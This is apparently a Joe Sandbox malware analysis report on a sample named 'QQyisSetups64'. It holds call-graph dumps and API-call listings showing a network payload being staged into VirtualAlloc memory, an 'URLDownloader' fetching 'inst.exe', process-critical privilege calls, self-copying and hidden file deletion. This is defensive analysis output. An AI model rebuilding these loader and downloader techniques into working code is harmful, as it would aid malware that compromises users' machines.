9575 1000cf1b ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@ ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 9575->9577 9576 1000d005 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@ ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 9576->9578 9577->9570 9577->9575 9578->9573 9578->9576 9579 1000d063 9578->9579 9579->9573 9581 10002a95 9580->9581 9581->9559 9581->9581 9595 1000cac0 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 9582->9595 9585 1000bf12 ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2 9586 1000bf09 9585->9586 9587 1000bf2c HandleT 9585->9587 9586->9566 9587->9586 9588 1000bf46 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 ?good@ios_base@std@ 9587->9588 9588->9586 9590 1000be86 9589->9590 9591 1000beaa 9590->9591 9592 1000be9e ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 9590->9592 9597 1000ca50 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 9591->9597 9592->9591 9596 1000beea ?good@ios_base@std@ 9595->9596 9596->9585 9596->9586 9598 1000beb2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z CloseHandle 9597->9598 9598->9439 9599->9450 10874 1000ee60 free 11290 10001360 11295 10001300 __std_exception_destroy 11290->11295 11292 1000136f 11293 10001382 11292->11293 11294 10010b1e _MallocaArrayHolder free 11292->11294 11294->11293 11295->11292 11296 28705e7 11301 2870427 11296->11301 11298 28705ef GetCurrentThread WaitForSingleObject CreateThread CreateThread 11315 2861147 LoadLibraryW GetProcAddress GetProcAddress 11298->11315 11358 100048c0 84 API calls 2 library calls 11298->11358 11359 100100c0 20 API calls 11298->11359 11302 28645c7 SHGetFolderPathA 11301->11302 11303 2870450 11302->11303 11321 2870357 GetModuleFileNameA 11303->11321 11305 2870463 11323 2870307 GetModuleFileNameA 11305->11323 11307 28704aa 11308 2870307 GetModuleFileNameA 11307->11308 11314 287053b 11307->11314 11309 2870565 11308->11309 11310 287057c CopyFileA 11309->11310 11325 2862077 11310->11325 11312 287058e ShellExecuteA 11327 2861807 GetModuleHandleA 11312->11327 11314->11298 11316 2861199 GetModuleHandleA RegisterClassW CreateWindowExW 11315->11316 11318 286121e GetMessageW 11316->11318 11319 286121c 11316->11319 11318->11319 11320 2861232 TranslateMessage DispatchMessageW 11318->11320 11320->11318 11322 287039f 11321->11322 11322->11305 11324 287033a 11323->11324 11324->11307 11326 2862086 11325->11326 11326->11312 11328 286184a 11327->11328 11337 28615d7 11328->11337 11330 28618a2 11331 286192f RegisterClassW 11330->11331 11343 2861727 11331->11343 11333 28619b2 CreateWindowExW ShowWindow 11334 28619eb GetMessageW 11333->11334 11335 2861a16 11334->11335 11336 28619ff TranslateMessage DispatchMessageW 11334->11336 11335->11314 11336->11334 11349 2862287 11337->11349 11339 2861612 SHGetKnownFolderPath 11340 286168e 11339->11340 11341 2861641 11339->11341 11340->11330 11342 2861680 CoTaskMemFree 11341->11342 11342->11340 11344 2861749 11343->11344 11346 2861780 _Error_objects 11343->11346 11351 2870748 RtlAcquireSRWLockExclusive 11344->11351 11346->11333 11347 2861753 _Error_objects 11347->11346 11356 28706f7 RtlAcquireSRWLockExclusive RtlReleaseSRWLockExclusive RtlWakeAllConditionVariable 11347->11356 11350 28622b8 _Error_objects 11349->11350 11350->11339 11352 287075c 11351->11352 11353 2870761 RtlReleaseSRWLockExclusive 11352->11353 11357 2870797 SleepConditionVariableSRW 11352->11357 11353->11347 11356->11346 11357->11352 11747 1000bde0 11748 10004510 11 API calls 11747->11748 11749 1000bdf2 11748->11749 11750 1000be0b 11749->11750 11751 10010b1e _MallocaArrayHolder free 11749->11751 11751->11750 11108 10011ce0 ??1_Lockit@std@@QAE 11752 2869962 11753 2869965 11752->11753 11754 28645c7 SHGetFolderPathA 11753->11754 11755 2869a0b _Smanip _Error_objects 11754->11755 11756 2864657 DeleteFileA 11755->11756 11757 2869c25 11756->11757 11758 2864417 SetFileAttributesA 11757->11758 11759 2869c56 11758->11759 11760 2869c68 Sleep 11759->11760 11761 2869c80 _Smanip _Error_objects 11760->11761 11762 2864657 DeleteFileA 11761->11762 11763 286a1ce 11762->11763 11764 2864417 SetFileAttributesA 11763->11764 11765 286a1ff 11764->11765 11766 286a211 Sleep 11765->11766 11767 286a229 _Smanip _Error_objects 11766->11767 11768 286a5d8 WinExec 11767->11768 11769 286a5eb _Smanip _Error_objects 11768->11769 11770 286a8ca WinExec Sleep 11769->11770 11771 286a8e8 11770->11771 11772 2864877 SetFileAttributesA 11771->11772 11773 286a904 11772->11773 11774 2864877 SetFileAttributesA 11773->11774 11775 286a93e 11774->11775 11776 2864657 DeleteFileA 11775->11776 11777 286a962 11776->11777 11778 2864657 DeleteFileA 11777->11778 11779 286a976 11778->11779 11109 1000d4e5 11110 1000d4ec 11109->11110 11111 1000dbb0 2 API calls 11110->11111 11112 1000d502 11111->11112 10887 10011c6d ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 11113 1000aaf0 11114 1000d330 8 API calls 11113->11114 11115 1000ab00 11114->11115 11116 1000c160 2 API calls 11115->11116 11117 1000ab0c 11116->11117 11780 100101f0 11781 1001015a 11780->11781 11782 1001031d 11780->11782 11783 100101f5 freeaddrinfo 11781->11783 11784 1001016d socket 11781->11784 11787 10010209 WSACleanup exit 11783->11787 11792 10010222 11783->11792 11785 10010196 WSACleanup exit 11784->11785 11786 100101af connect 11784->11786 11785->11782 11788 100101d3 closesocket 11786->11788 11789 100101ee 11786->11789 11787->11782 11788->11781 11789->11783 11790 10010229 recv 11791 100102a1 11790->11791 11790->11792 11794 100102a7 11791->11794 11795 100102ab closesocket WSACleanup free exit 11791->11795 11792->11790 11793 10010276 realloc 11792->11793 11796 100102e8 VirtualAlloc memmove 11792->11796 11793->11792 11794->11796 11795->11782 11796->11782 11118 2870e72 11119 2870e80 11118->11119 11120 2870e7b 11118->11120 11128 2870d3c 11119->11128 11124 287140d 11120->11124 11125 2871423 11124->11125 11127 287142c 11125->11127 11144 28713c0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11125->11144 11127->11119 11130 2870d48 ___scrt_is_nonwritable_in_current_image 11128->11130 11129 2870d57 11130->11129 11131 2870d71 dllmain_raw 11130->11131 11132 2870d6c 11130->11132 11131->11129 11133 2870d8b 11131->11133 11132->11129 11149 2871458 11132->11149 11145 2870b34 11133->11145 11137 2870ddd 11137->11129 11139 2870b34 __DllMainCRTStartup@12 6 API calls 11137->11139 11138 2871458 _DllMain@12 DisableThreadLibraryCalls 11140 2870dc4 11138->11140 11141 2870df0 11139->11141 11143 2870dd2 dllmain_raw 11140->11143 11141->11129 11142 2870df9 dllmain_raw 11141->11142 11142->11129 11143->11137 11144->11127 11146 2870b3f 11145->11146 11148 2870b44 __DllMainCRTStartup@12 11145->11148 11146->11148 11153 2870b87 11146->11153 11148->11132 11150 2870dac 11149->11150 11151 2871461 11149->11151 11150->11137 11150->11138 11151->11150 11152 287146a DisableThreadLibraryCalls 11151->11152 11152->11150 11154 2870b93 ___scrt_is_nonwritable_in_current_image 11153->11154 11167 2870919 11154->11167 11156 2870b9a __DllMainCRTStartup@12 11157 2870c86 11156->11157 11158 2870bc1 11156->11158 11166 2870bfd ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11156->11166 11179 2871224 IsProcessorFeaturePresent 11157->11179 11171 287087b 11158->11171 11161 2870bd0 __RTC_Initialize 11161->11166 11174 287147a RtlInitializeSListHead 11161->11174 11162 2870c8d 11164 2870bde __DllMainCRTStartup@12 11164->11166 11175 2870850 11164->11175 11166->11148 11168 2870922 11167->11168 11183 2870ee7 IsProcessorFeaturePresent 11168->11183 11170 287092e ___scrt_uninitialize_crt 11170->11156 11185 2870952 11171->11185 11173 2870882 11173->11161 11174->11164 11176 2870855 ___scrt_release_startup_lock 11175->11176 11177 2870ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 11176->11177 11178 287085e __DllMainCRTStartup@12 11176->11178 11177->11178 11178->11166 11180 287123a __DllMainCRTStartup@12 11179->11180 11181 28712e5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11180->11181 11182 2871329 __DllMainCRTStartup@12 11181->11182 11182->11162 11184 2870f0b 11183->11184 11184->11170 11186 2870962 11185->11186 11187 287095e 11185->11187 11188 2871224 __DllMainCRTStartup@12 4 API calls 11186->11188 11190 287096f ___scrt_release_startup_lock 11186->11190 11187->11173 11189 28709d8 11188->11189 11190->11173 10888 1000b276 10889 100020a0 2 API calls 10888->10889 10890 1000b285 10889->10890 11369 10004178 11370 10004181 11369->11370 11371 1000b950 10 API calls 11370->11371 11375 1000421b _Error_objects 11370->11375 11372 10004209 11371->11372 11373 10004237 11372->11373 11374 1000426c 11372->11374 11372->11375 11376 1000b950 10 API calls 11373->11376 11378 1000b950 10 API calls 11374->11378 11377 1000cd10 10 API calls 11375->11377 11376->11375 11379 1000431d 11377->11379 11380 1000429c 11378->11380 11382 10004020 5 API calls 11379->11382 11381 1000b950 10 API calls 11380->11381 11381->11375 11383 1000432f 11382->11383 11384 10002190 8 API calls 11383->11384 11385 10004341 11384->11385 11386 100020a0 2 API calls 11385->11386 11387 1000436b 11386->11387 11388 1000b970 2 API calls 11387->11388 11389 1000437a 11388->11389
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 028604AE
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028604DE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                                                                      • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                                                                      • API String ID: 2032221330-2899676511
                                                                                                                                                                                                                      • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                                      • Instruction ID: 20b1533ca945967a01a7202aa5fb22a40f2745df98c920629b603b0611bc0325
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1628A395083858FD720CF24C844BABBBE5FF94704F04492DE9C9DB292E7719948CB9A

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 10001BCA
                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 10001BE6
                                                                                                                                                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,10012458,?,10001BA3,?,?,?), ref: 10001BF8
                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10001C2D
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10001C4A
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 10001C65
                                                                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10001C8E
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 10001D1B
                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10001D2B
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 10001D38
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 10001D42
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 10001D4C
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 10001D5B
                                                                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10001D93
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindowexitfclosefopenfwrite
                                                                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                                                                      • API String ID: 3413257080-3182466430
                                                                                                                                                                                                                      • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                                      • Instruction ID: ddbd601f5f187a188268b5c7d9f2a971705c802d5f1a5a55912b1b5dcc305942
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A5109B5D40219ABEB04DFA4CC85FEEB775FF48741F108209F605BA290D774AA90CB61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000F26D
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 1000F298
                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(Function_0000D110), ref: 1000F2C1
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1000F2CB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Failed to retrieve first process., xrefs: 1000F2A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
                                                                                                                                                                                                                      • String ID: Failed to retrieve first process.
                                                                                                                                                                                                                      • API String ID: 592929778-1967016982
                                                                                                                                                                                                                      • Opcode ID: c852dc96d88058524c01f60ee48262a4910037a9236e4f06e5116644cdcb3d29
                                                                                                                                                                                                                      • Instruction ID: 0ce586cc59c24ae6f6b9b608917b68c1bdf63cf15262094913b6f28177916ec4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c852dc96d88058524c01f60ee48262a4910037a9236e4f06e5116644cdcb3d29
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D1196B4900218FFEB10EFB0CD89AAE77B8EF08391F104699E90597155D734EB54EB50

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                                                                      • RpcBindingFromStringBindingW.RPCRT4(10001D8E,00000000), ref: 1000EED9
                                                                                                                                                                                                                      • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 1000EF10
                                                                                                                                                                                                                      • RpcStringFreeW.RPCRT4(10001D8E), ref: 1000EF1A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                                                                      • String ID: localhost
                                                                                                                                                                                                                      • API String ID: 1126441048-2663516195
                                                                                                                                                                                                                      • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                                      • Instruction ID: cda66700fc1d67de1566ef6c2ee8939abb6b7c8c1a3f56331cb5e05d924021ce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611D7B4D00209BFEB14CFE4C985BEEBBB4FB08704F108159E605BB280D7B59A54CBA0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(00000008), ref: 10001A93
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10001A9D
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001AC3
                                                                                                                                                                                                                      • SetWindowTheme.UXTHEME(00030458,10012444,10012440), ref: 10001ADE
                                                                                                                                                                                                                      • SendMessageW.USER32(00030458,00000409,00000000,00D77800), ref: 10001AF7
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001B08
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001B80,?,00000000,00000000), ref: 10001B49
                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 10001B54
                                                                                                                                                                                                                      • DefWindowProcW.USER32(00000002,?,?,?), ref: 10001B6D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                                                                                                                                      • String ID: $msctls_progress32
                                                                                                                                                                                                                      • API String ID: 1181878002-3669180086
                                                                                                                                                                                                                      • Opcode ID: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
                                                                                                                                                                                                                      • Instruction ID: 2e44a71670f0cdec86f34bb6316c117ddb1687e3aa8b51598d2db09470581217
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9431F6B4A44208FFF710DF94CC89FAA7BB5EB48741F208158FA09AB295D770E950CB65

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 10001852
                                                                                                                                                                                                                        • Part of subcall function 10001600: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                                                                        • Part of subcall function 10001600: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                                                                        • Part of subcall function 10001600: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 100019AD
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,10011876), ref: 100019E8
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,10011876), ref: 100019F7
                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001A1E
                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 10001A2C
                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 10001A36
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageWindow$CallbackClassCreateDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskTranslateUserwcstombs
                                                                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                                                                      • API String ID: 919245287-3182466430
                                                                                                                                                                                                                      • Opcode ID: 0d4dfe86d5ddc5449cab5c970eae05cdbd8c2cc98e2f02f6d169f1be2c235799
                                                                                                                                                                                                                      • Instruction ID: 02b1e0a1a7493eeed2e2321454f16a2ce6d8cc5e573885ca1cf39a898ac010b9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d4dfe86d5ddc5449cab5c970eae05cdbd8c2cc98e2f02f6d169f1be2c235799
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 215107B5D00318AFEB54CFA4CC45BDEBBB5FB48340F108169E119A7295EB746A44CF61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 1001061D
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000), ref: 10010624
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 10010639
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 1001064E
                                                                                                                                                                                                                        • Part of subcall function 10001170: LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                                                                        • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                                                                        • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                                                                        • Part of subcall function 10001170: GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                                                                        • Part of subcall function 10001170: RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                                                                        • Part of subcall function 10001170: CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001065B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindowexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1070008423-0
                                                                                                                                                                                                                      • Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                                      • Instruction ID: b32196050963cedc899c835c863bf3fa77a81109efd19031f53f5ae39edb479e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E026B53C4354BBF265A7E05C8BF4936549B09F42F608650F309BD0E2CAF4B450C62D

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 1000EE80: RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                                                                      • _swprintf.LIBCMTD ref: 1000F3DC
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 1000F433
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 1000F484
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
